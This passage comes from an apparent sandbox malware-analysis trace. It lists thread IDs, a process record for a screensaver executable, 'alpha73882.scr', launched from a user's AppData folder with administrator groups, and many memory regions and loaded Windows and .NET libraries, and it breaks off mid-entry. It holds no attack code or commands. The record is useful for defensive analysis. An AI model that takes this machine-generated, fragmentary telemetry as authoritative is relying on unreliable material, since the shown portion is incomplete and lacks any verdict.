99 os_tid = 0x888 Thread: id = 100 os_tid = 0x434 Thread: id = 101 os_tid = 0xba4 Thread: id = 102 os_tid = 0x834 Thread: id = 103 os_tid = 0xb18 Thread: id = 104 os_tid = 0x57c Thread: id = 105 os_tid = 0xbec Thread: id = 106 os_tid = 0xaf0 Thread: id = 107 os_tid = 0xac0 Thread: id = 108 os_tid = 0x4ac Thread: id = 109 os_tid = 0x4b8 Thread: id = 110 os_tid = 0x880 Thread: id = 111 os_tid = 0xb3c Thread: id = 112 os_tid = 0x8ac Thread: id = 113 os_tid = 0x894 Thread: id = 114 os_tid = 0x890 Thread: id = 115 os_tid = 0x830 Thread: id = 116 os_tid = 0x578 Thread: id = 117 os_tid = 0x814 Thread: id = 118 os_tid = 0x7ac Thread: id = 119 os_tid = 0x4f8 Thread: id = 120 os_tid = 0x478 Thread: id = 121 os_tid = 0x404 Thread: id = 122 os_tid = 0x15c Thread: id = 123 os_tid = 0x7f8 Thread: id = 124 os_tid = 0x7d8 Thread: id = 125 os_tid = 0x7b8 Thread: id = 126 os_tid = 0x764 Thread: id = 127 os_tid = 0x720 Thread: id = 128 os_tid = 0x714 Thread: id = 129 os_tid = 0x65c Thread: id = 130 os_tid = 0x63c Thread: id = 131 os_tid = 0x54c Thread: id = 132 os_tid = 0x50c Thread: id = 133 os_tid = 0x4b4 Thread: id = 134 os_tid = 0x484 Thread: id = 135 os_tid = 0x454 Thread: id = 136 os_tid = 0x440 Thread: id = 137 os_tid = 0x41c Thread: id = 138 os_tid = 0x418 Thread: id = 139 os_tid = 0x414 Thread: id = 140 os_tid = 0x26c Thread: id = 141 os_tid = 0x38c Thread: id = 142 os_tid = 0x158 Thread: id = 143 os_tid = 0x154 Thread: id = 144 os_tid = 0x16c Thread: id = 145 os_tid = 0x25c Thread: id = 146 os_tid = 0x178 Thread: id = 147 os_tid = 0x17c Thread: id = 148 os_tid = 0x184 Thread: id = 149 os_tid = 0x3f8 Thread: id = 151 os_tid = 0xe64 Thread: id = 152 os_tid = 0xe78 Thread: id = 153 os_tid = 0x10dc Thread: id = 158 os_tid = 0xe98 Thread: id = 159 os_tid = 0xeac Thread: id = 189 os_tid = 0xf90 Thread: id = 191 os_tid = 0xfbc Thread: id = 193 os_tid = 0x102c Thread: id = 196 os_tid = 0x13c0 Thread: id = 197 os_tid = 0x594 Thread: id = 216 os_tid = 0x9f8 Thread: id = 217 os_tid = 0x904 Thread: id = 218 os_tid = 0x1358 Thread: id = 219 os_tid = 0xd88 Thread: id = 220 os_tid = 0xd7c Process: id = "6" image_name = "alpha73882.scr" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.scr" page_root = "0x6d055000" os_pid = "0xe48" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xdcc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fc8c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1849 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1850 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1851 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1852 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1853 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1854 start_va = 0x4f0000 end_va = 0x581fff monitored = 1 entry_point = 0x57c06e region_type = mapped_file name = "alpha73882.scr" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.scr") Region: id = 1855 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1856 start_va = 0x77840000 end_va = 0x779bafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1857 start_va = 0x7f7e0000 end_va = 0x7f802fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7e0000" filename = "" Region: id = 1858 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1859 start_va = 0x7fff0000 end_va = 0x7ffb56e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1860 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1861 start_va = 0x7ffb57011000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb57011000" filename = "" Region: id = 1863 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1864 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1865 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1869 start_va = 0x5a0000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1870 start_va = 0x52570000 end_va = 0x525bffff monitored = 0 entry_point = 0x52588180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1871 start_va = 0x524f0000 end_va = 0x52569fff monitored = 0 entry_point = 0x52503290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1872 start_va = 0x76b60000 end_va = 0x76c3ffff monitored = 0 entry_point = 0x76b73980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1873 start_va = 0x525c0000 end_va = 0x525c7fff monitored = 0 entry_point = 0x525c17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1874 start_va = 0x780000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 1875 start_va = 0x70a70000 end_va = 0x70ac8fff monitored = 1 entry_point = 0x70a80780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 1876 start_va = 0x76b60000 end_va = 0x76c3ffff monitored = 0 entry_point = 0x76b73980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1877 start_va = 0x771a0000 end_va = 0x7731dfff monitored = 0 entry_point = 0x77251b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1878 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1879 start_va = 0x7f6e0000 end_va = 0x7f7dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6e0000" filename = "" Region: id = 1880 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1881 start_va = 0x590000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1882 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1883 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1884 start_va = 0x744c0000 end_va = 0x74551fff monitored = 0 entry_point = 0x74500380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1885 start_va = 0x590000 end_va = 0x593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1886 start_va = 0x7f330000 end_va = 0x7f6d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1887 start_va = 0x762c0000 end_va = 0x7633afff monitored = 0 entry_point = 0x762de970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1888 start_va = 0x74ad0000 end_va = 0x74b8dfff monitored = 0 entry_point = 0x74b05630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1889 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1890 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1891 start_va = 0x76ec0000 end_va = 0x76f03fff monitored = 0 entry_point = 0x76ed9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1892 start_va = 0x76dc0000 end_va = 0x76e6cfff monitored = 0 entry_point = 0x76dd4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1893 start_va = 0x74570000 end_va = 0x7458dfff monitored = 0 entry_point = 0x7457b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1894 start_va = 0x74560000 end_va = 0x74569fff monitored = 0 entry_point = 0x74562a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1895 start_va = 0x745b0000 end_va = 0x74607fff monitored = 0 entry_point = 0x745f25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1896 start_va = 0xa00000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1897 start_va = 0x6ff90000 end_va = 0x7000cfff monitored = 1 entry_point = 0x6ffa0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 1910 start_va = 0x77320000 end_va = 0x77364fff monitored = 0 entry_point = 0x7733de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1911 start_va = 0x77370000 end_va = 0x7752cfff monitored = 0 entry_point = 0x77452a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1912 start_va = 0x76f10000 end_va = 0x7705efff monitored = 0 entry_point = 0x76fc6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1955 start_va = 0x77580000 end_va = 0x776c6fff monitored = 0 entry_point = 0x77591cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1956 start_va = 0x6a0000 end_va = 0x6c9fff monitored = 0 entry_point = 0x6a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1957 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1958 start_va = 0xbe0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1959 start_va = 0x76930000 end_va = 0x7695afff monitored = 0 entry_point = 0x76935680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1964 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1965 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1966 start_va = 0xbf0000 end_va = 0xd70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 1967 start_va = 0xd80000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 1968 start_va = 0x780000 end_va = 0x810fff monitored = 1 entry_point = 0x80c06e region_type = mapped_file name = "alpha73882.scr" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.scr") Region: id = 1969 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1998 start_va = 0x74ac0000 end_va = 0x74acbfff monitored = 0 entry_point = 0x74ac3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1999 start_va = 0x70a60000 end_va = 0x70a67fff monitored = 0 entry_point = 0x70a617b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2010 start_va = 0x6f8a0000 end_va = 0x6ff80fff monitored = 1 entry_point = 0x6f8ccd70 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2024 start_va = 0x6f7a0000 end_va = 0x6f894fff monitored = 0 entry_point = 0x6f7f4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 2026 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2027 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2028 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2029 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 2030 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2031 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2032 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2033 start_va = 0x720000 end_va = 0x720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2034 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2035 start_va = 0x2180000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 2036 start_va = 0x780000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2037 start_va = 0x780000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2038 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 2039 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2040 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2041 start_va = 0x2320000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2042 start_va = 0x2180000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 2043 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 2044 start_va = 0xb90000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2045 start_va = 0x4320000 end_va = 0x441ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 2051 start_va = 0x4420000 end_va = 0x4756fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2054 start_va = 0x6d840000 end_va = 0x6eaf1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll") Region: id = 2055 start_va = 0x76340000 end_va = 0x7642afff monitored = 0 entry_point = 0x7637d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2056 start_va = 0x2220000 end_va = 0x22b0fff monitored = 0 entry_point = 0x2258cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2059 start_va = 0x74440000 end_va = 0x744b4fff monitored = 0 entry_point = 0x74479a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2060 start_va = 0x740000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2069 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2070 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2071 start_va = 0x70030000 end_va = 0x700affff monitored = 1 entry_point = 0x70031180 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 2072 start_va = 0x77070000 end_va = 0x77101fff monitored = 0 entry_point = 0x770a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2073 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2074 start_va = 0x6edd0000 end_va = 0x6f79bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll") Region: id = 2075 start_va = 0x6d6b0000 end_va = 0x6d83efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll") Region: id = 2078 start_va = 0x6ca40000 end_va = 0x6d6a6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll") Region: id = 2080 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2081 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2082 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2083 start_va = 0x2220000 end_va = 0x22aefff monitored = 0 entry_point = 0x222dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 2084 start_va = 0x6ed30000 end_va = 0x6edc1fff monitored = 0 entry_point = 0x6ed3dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 2085 start_va = 0x2220000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2089 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2090 start_va = 0x4760000 end_va = 0x481bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004760000" filename = "" Region: id = 2091 start_va = 0x7d0000 end_va = 0x7d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2092 start_va = 0x7e0000 end_va = 0x7e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2093 start_va = 0x4820000 end_va = 0x4a2afff monitored = 0 entry_point = 0x48cb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2094 start_va = 0x73180000 end_va = 0x7338efff monitored = 0 entry_point = 0x7322b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2095 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2096 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2097 start_va = 0x4820000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 2098 start_va = 0x74420000 end_va = 0x7443cfff monitored = 0 entry_point = 0x74423b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2099 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2100 start_va = 0x2220000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2101 start_va = 0x2290000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2102 start_va = 0x4820000 end_va = 0x491ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 2103 start_va = 0x4920000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 2104 start_va = 0x2260000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2105 start_va = 0x22a0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 2106 start_va = 0x4930000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 2242 start_va = 0x6c310000 end_va = 0x6ca30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll") Region: id = 2243 start_va = 0x6c210000 end_va = 0x6c300fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll") Region: id = 2244 start_va = 0x6baf0000 end_va = 0x6c20dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = 